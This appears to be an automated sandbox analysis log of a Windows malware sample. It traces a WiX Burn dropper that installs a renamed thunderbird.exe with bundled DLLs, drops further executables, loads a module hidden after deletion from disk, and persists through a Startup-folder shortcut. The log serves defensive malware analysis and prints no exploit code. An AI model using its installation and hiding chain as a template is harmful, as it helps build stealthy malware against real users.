Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: softokn3.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: dkxfiwecupyge.11.dr	LNK file: ..\..\Roaming\GZManage\thunderbird.exe
Source: BITB5CE.tmp.13.dr	LNK file: ..\..\Roaming\GZManage\thunderbird.exe

Source: C:\Windows\SysWOW64\cmd.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: MiJZ3z4t5K.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: MiJZ3z4t5K.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: MiJZ3z4t5K.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: AppsLo.exe, 00000006.00000000.2322329895.00000000008EB000.00000002.00000001.01000000.00000008.sdmp, AppsLo.exe, 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmp, AppsLo.exe, 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmp, AppsLo.exe, 00000007.00000000.2326342375.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\smime\smime3.pdb source: thunderbird.exe, 00000008.00000003.2452218692.0000000003143000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nsprpub\lib\libc\src\plc4.pdb source: thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\xpcom\build\xpcom_core.pdb source: AppsLo.exe, 00000007.00000003.2335434052.0000000001186000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2458651794.0000000003140000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\js\src\js3250.pdb source: thunderbird.exe, 00000008.00000003.2451244929.0000000003143000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Qjsync.exe, 00000011.00000002.3022572775.0000000003CB6000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3028506942.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3024927145.00000000052B0000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3023518128.00000000046B7000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3029133169.00000000064B1000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3023737831.00000000048BD000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3022953947.00000000040B3000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021471019.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3020860602.0000000002255000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3029759154.00000000068B0000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3030087680.0000000006ABA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\bb\ke-win-x86-r\edit-6.1\build\release\scintilla\bin\SciLexer.pdb source: AppsLo.exe, 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: thunderbird.exe, 00000008.00000002.2460817581.0000000004500000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2460307129.00000000041A9000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636596429.00000000041C3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636744195.0000000004520000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636909160.00000000048D2000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2919742009.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920632911.00000000058B0000.00000004.00001000.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990472839.0000000004510000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990659694.00000000048C5000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990329847.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.3342995119.00000000055F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Qjsync.exe, 00000011.00000002.3022572775.0000000003CB6000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3028506942.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3024927145.00000000052B0000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3023518128.00000000046B7000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3029133169.00000000064B1000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3023737831.00000000048BD000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3022953947.00000000040B3000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021471019.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3020860602.0000000002255000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3029759154.00000000068B0000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3030087680.0000000006ABA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: thunderbird.exe, 00000008.00000002.2460817581.0000000004500000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2460307129.00000000041A9000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636596429.00000000041C3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636744195.0000000004520000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636909160.00000000048D2000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2919742009.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920632911.00000000058B0000.00000004.00001000.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990472839.0000000004510000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990659694.00000000048C5000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990329847.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.3342995119.00000000055F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\mail\app\thunderbird.pdb source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\softokn\softokn3.pdb source: thunderbird.exe, 00000008.00000003.2452341930.0000000003143000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\nss\nss3.pdb source: thunderbird.exe, 00000008.00000003.2451905011.0000000003143000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nsprpub\pr\src\nspr4.pdb source: thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp

Source: MiJZ3z4t5K.exe

Static PE information: 0xF33E2DE9 [Mon Apr 27 02:01:13 2099 UTC]

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

Code function: 7_2_1006FAB0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

7_2_1006FAB0

Source: xpcom_core.dll.7.dr	Static PE information: real checksum: 0x744ed should be: 0x73f41
Source: smomwacaueqiut.11.dr	Static PE information: real checksum: 0x294459 should be: 0x290abc
Source: Trombone.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x9c0ef
Source: xpcom_core.dll.8.dr	Static PE information: real checksum: 0x744ed should be: 0x73f41

Source: AppsLo.exe.0.dr	Static PE information: section name: .wixburn
Source: AppsLo.exe.6.dr	Static PE information: section name: .wixburn
Source: Qjsync.exe.11.dr	Static PE information: section name: Shared
Source: smomwacaueqiut.11.dr	Static PE information: section name: .xdata
Source: smomwacaueqiut.11.dr	Static PE information: section name: utage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_041A4277 push ebx; ret	1_2_041A42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_041A3A9C push ebx; retf	1_2_041A3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_041A3ADC push ebx; retf	1_2_041A3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07154896 push ebp; retf	1_2_07154898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_082C8B10 push eax; ret	1_2_082C8B03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_082C77B8 push eax; iretd	1_2_082C77B9
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008CEAD6 push ecx; ret	6_2_008CEAE9
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F7EAD6 push ecx; ret	7_2_00F7EAE9
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10069B01 push ecx; ret	7_2_10069B14
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10063D94 push ecx; ret	7_2_10063DA7

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

File written: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe

Jump to behavior

Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\xpcom_compat.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\xpcom_compat.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\js3250.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\softokn3.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Jump to dropped file
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	File created: C:\Windows\Temp\AppsLo.exe	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\softokn3.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nsldap32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nspr4.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\nsldap32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\nss3.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\plc4.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\xpcom_core.dll	Jump to dropped file
Source: C:\Windows\Temp\AppsLo.exe	File created: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\smomwacaueqiut	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\smime3.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\ssl3.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\plds4.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\smime3.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\Trombone.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\js3250.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\nsldappr32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\nspr4.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nsldappr32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\xpcom_core.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nss3.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\plc4.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\ssl3.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\plds4.dll	Jump to dropped file
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Jump to dropped file

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\xpcom_core.dll	Jump to dropped file
Source: C:\Windows\Temp\AppsLo.exe	File created: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\xpcom_compat.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\plds4.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\smime3.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\js3250.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\softokn3.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Jump to dropped file
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	File created: C:\Windows\Temp\AppsLo.exe	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\Trombone.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nsldappr32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nsldap32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nss3.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\plc4.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nspr4.dll	Jump to dropped file
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	File created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\ssl3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\smomwacaueqiut

Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITB5CE.tmp

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITB5CE.tmp

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\SMOMWACAUEQIUT

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
